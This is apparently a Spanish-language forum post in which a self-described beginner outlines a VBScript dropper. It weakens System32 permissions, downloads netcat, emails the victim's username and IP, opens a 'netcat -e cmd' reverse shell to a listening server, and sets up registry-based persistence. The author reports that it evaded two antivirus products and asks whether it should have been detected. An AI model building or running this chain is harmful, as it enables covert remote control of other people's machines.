Soy bastante nuevo en este tipo de cosas y estoy experimentando un poco. Este fin de semana tuve algo de tiempo libre y decidí bromear con VBScript y powershell. Lo que hice es escribir un VBScript que puede ejecutarse como usuario normal o como administrador y hace lo siguiente cuando se ejecuta:
-
Crea un script .bat e inserta el código manualmente en el script línea por línea y luego lo ejecuta. El .bat contiene:
- Un comando de toma de control para system32, sysWOW64 (si se ejecuta como administrador, por supuesto)
- Un comando icacls que hace que las carpetas anteriores sean modificables por cualquier persona
- Ejecuta el script de powershell creado anteriormente
- Agrega un .vbs en el registro de la máquina local para ejecutarse en el inicio como sistema
-
Crea un script de powershell e inserta el código manualmente en el script línea por línea. El .ps1 contiene:
- Primero descarga netcat
- Luego procede a descomprimir el archivo descargado
- Luego toma el nombre de usuario del sistema y la IP pública
- Envía los datos a través de smtp a un correo electrónico específico
- Finalmente ejecuta netcat.exe con argumentos: "netcat.exe -e cmd {ip de servidores de escucha pública} {puerto}"
-
Crea otro .vbs e inserta el código línea por línea manualmente (que se ejecutará en el inicio como se indica en el .bat). El .vbs contiene:
- Un bucle do while que cada 5 minutos ejecuta un archivo .bat que contiene "netcat.exe -e cmd {servidores de escucha pública ip} {puerto}" como comando (para que pueda tener una puerta trasera persistente)
-
Un archivo .bat que contiene un solo comando:
- "netcat.exe -e cmd {servidores de escucha pública ip} {puerto}"
-
Ejecute .bat en el fondo oculto al usuario
En el lado del "atacante" tengo netcat abierto escuchando en el puerto especificado. Pude obtener un cmd elevado sin ningún disparo de AV (probado con Avira, ESET).
Esto funciona en Windows 7, 8, 10 x64 y lo hice compatible tanto con powershell v. < 3 como v. > 3.
Lo que logré es un cmd elevado con persistencia sin activar la detección de AV y me pareció muy fácil de lograr.
¿Debería haber sido detectado como una amenaza potencial por el software antivirus y eliminarlo del sistema? Puedo realizar la ejecución remota de código y obtener acceso completo al sistema de destino
Este proyecto se ejecutó en un entorno local del que soy propietario. No tengo intenciones de nada más